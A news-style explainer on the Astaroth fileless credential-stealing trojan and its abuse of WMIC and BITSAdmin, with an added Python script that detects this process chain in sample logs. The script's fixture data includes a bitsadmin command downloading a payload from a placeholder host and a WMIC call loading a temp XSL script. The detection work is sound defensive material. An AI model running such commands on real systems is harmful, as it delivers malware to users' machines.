Have you heard of the “Great Duke of Hell”, a new “invisible man” malware targeting Windows users? It is malware that can steal your credentials using this “invisible man” (fileless) approach. For more details about this Windows malware attack, read on.

Windows security has always been a topic of concern. Microsoft has kept releasing updates and patches over the years to strengthen the security of its system. Recently, the “Great Duke of Hell” malware has become a hot topic.

Great Duke of Hell: the Credential-stealing Malware

What is the Great Duke of Hell? Specifically, it is a Trojan program designed to gather the credentials of Windows users.

Trojan program

Researchers in the Microsoft Defender Advanced Threat Protection (ATP) Research Team issued a warning to inform Windows users of the Great Duke of Hell threat.

The researchers describe it as a notorious and very dangerous credential-stealing malware. Why? Because the attack chain uses only files that are legitimate tools already present on the system, so it can hide in plain sight: the computer's own tools are directed to run the malicious commands, which lets the Duke of Hell slip past most malware detection systems.

In short, this Windows malware attack is a real possibility; you could fall victim to it at any time.


Astaroth Trojan

The “Great Duke of Hell”, also known as the Astaroth Trojan, uses a number of techniques, such as keylogging and clipboard monitoring, which let this Windows malware steal login credentials easily.

The Astaroth Trojan abuses living-off-the-land binaries (LOLbins), which has earned the malware a certain infamy. Microsoft confirmed the campaign in a recently published report, and the Windows Management Instrumentation Command-line (WMIC) tool was identified as the LOLbin being abused.

How Does the Fileless Attack Work?

According to Andrea Lelli, the author of the report and a member of the Microsoft Defender ATP Research Team, the attack depends on the victim clicking a malicious link in an email. The link leads to a file that runs an obfuscated batch file. The batch file, in turn, runs the legitimate WMIC system tool, which executes an obfuscated JavaScript file. From there things get more troublesome: more legitimate system tools and more obfuscated JavaScript code are involved.


What is the most important element in the attack chain? Undoubtedly, the Background Intelligent Transfer Service admin tool (BITSAdmin), which is responsible for downloading the extra payloads.
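The attack chain described above (an email link leading to a batch file, the batch file launching WMIC, and BITSAdmin fetching further payloads) is exactly the kind of parent-child process sequence a defender can look for in endpoint telemetry. The following Python script is an added example, not code from the original article or from Microsoft's report: it parses a few constructed process-creation events (the pipe-separated log format, host names, paths and URL are all made up for illustration) and flags wmic.exe or bitsadmin.exe processes whose ancestry leads back to a cmd.exe that was started with a .bat or .cmd file. The assumption that a suspicious WMIC call references a script file via /format, and the depth limit of four ancestors, are heuristics chosen for this example.

```python
"""Added example: detect the batch -> WMIC -> BITSAdmin LOLbin chain in process logs."""
import re
from collections import defaultdict

# Constructed process-creation events: time|host|pid|ppid|image|command line.
# Every path, host and URL here is a placeholder, not an indicator from the report.
SAMPLE_EVENTS = r"""
10:00:01|WS01|400|300|C:\Windows\explorer.exe|explorer.exe
10:00:05|WS01|512|400|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\alice\AppData\Local\Temp\update.bat
10:00:06|WS01|530|512|C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:C:\Users\alice\AppData\Local\Temp\x.xsl
10:00:09|WS01|544|530|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job1 /download /priority high http://placeholder.invalid/p.bin C:\Users\alice\AppData\Local\Temp\p.bin
10:00:20|WS01|600|400|C:\Windows\System32\cmd.exe|cmd.exe /c dir
10:00:21|WS01|610|600|C:\Windows\System32\wbem\WMIC.exe|wmic os get caption
"""

LOLBINS = {"wmic.exe", "bitsadmin.exe"}          # the two tools the article names
BATCH_RE = re.compile(r"\.(?:bat|cmd)\b", re.IGNORECASE)
MAX_DEPTH = 4  # assumed: how many ancestors to inspect for the batch-file cmd.exe


def parse_events(text):
    """Parse the pipe-separated events into dicts keyed by (host, pid)."""
    events = {}
    for line in text.strip().splitlines():
        ts, host, pid, ppid, image, cmdline = line.split("|", 5)
        events[(host, int(pid))] = {
            "ts": ts, "host": host, "pid": int(pid), "ppid": int(ppid),
            "image": image.rsplit("\\", 1)[-1].lower(),  # keep only the file name
            "cmdline": cmdline,
        }
    return events


def batch_root(events, ev):
    """Walk up the process tree from ev; return the nearest cmd.exe ancestor
    that was started with a .bat/.cmd argument, or None if there is none."""
    cur = ev
    for _ in range(MAX_DEPTH):
        cur = events.get((cur["host"], cur["ppid"]))
        if cur is None:
            return None
        if cur["image"] == "cmd.exe" and BATCH_RE.search(cur["cmdline"]):
            return cur
    return None


def find_lolbin_alerts(events):
    """One alert per LOLbin process whose ancestry leads back to a batch file."""
    alerts = []
    for ev in events.values():
        if ev["image"] not in LOLBINS:
            continue
        root = batch_root(events, ev)
        if root is None:
            continue  # e.g. an admin running wmic interactively: not flagged
        alerts.append({"host": ev["host"], "pid": ev["pid"], "lolbin": ev["image"],
                       "root_pid": root["pid"], "root_cmd": root["cmdline"]})
    return alerts


def summarize_chains(alerts):
    """Group alerts by the batch-file cmd.exe that started them, so that the
    WMIC step and the BITSAdmin download show up as one chain."""
    chains = defaultdict(set)
    for a in alerts:
        chains[(a["host"], a["root_pid"])].add(a["lolbin"])
    return {key: sorted(bins) for key, bins in chains.items()}


def severity(lolbins):
    """A chain using both WMIC and BITSAdmin matches the staged download the report describes."""
    return "high" if {"wmic.exe", "bitsadmin.exe"} <= set(lolbins) else "medium"


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for (host, root_pid), bins in summarize_chains(find_lolbin_alerts(evs)).items():
        print(f"{host}: batch-file cmd.exe pid={root_pid} spawned {bins} -> severity {severity(bins)}")
```

Run as-is, the script flags the WMIC process (pid 530) and the BITSAdmin download (pid 544) under the batch-file cmd.exe (pid 512) as one high-severity chain, while the interactive `wmic os get caption` under a plain `cmd.exe /c dir` is left alone. In a real deployment the same logic would run over Sysmon event ID 1 or Windows Security event 4688 records rather than the constructed lines above.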

Undeniably, the Great Duke of Hell is a milestone in the development of cyber threats. Fileless malware has been a growing concern in recent years. What does fileless malware mean? It refers to malware that does not attack the system through a specific file written to it (as in the past) but instead runs from your PC's RAM. Although more and more people are aware that cyber threats have become a primary danger to national security, fileless attacks are a particular problem: they are hard to discover with traditional detection methods, and finding them in time requires the help of advanced diagnostics.

The Researchers’ Point of View

“As is known to all, these fileless attacks are able to run the malicious payloads directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk,” said Andrea Lelli, a researcher from the Microsoft Defender ATP Research Team.

“These attacks are considered challenging to detect as the full process of the deployment and execution of the malware is by way of those Windows LOLBins. To an average person, this activity can seem like a legitimate Windows activity because it’s being executed by Windows processes,” said Eli Salem, a security researcher at Cybereason.
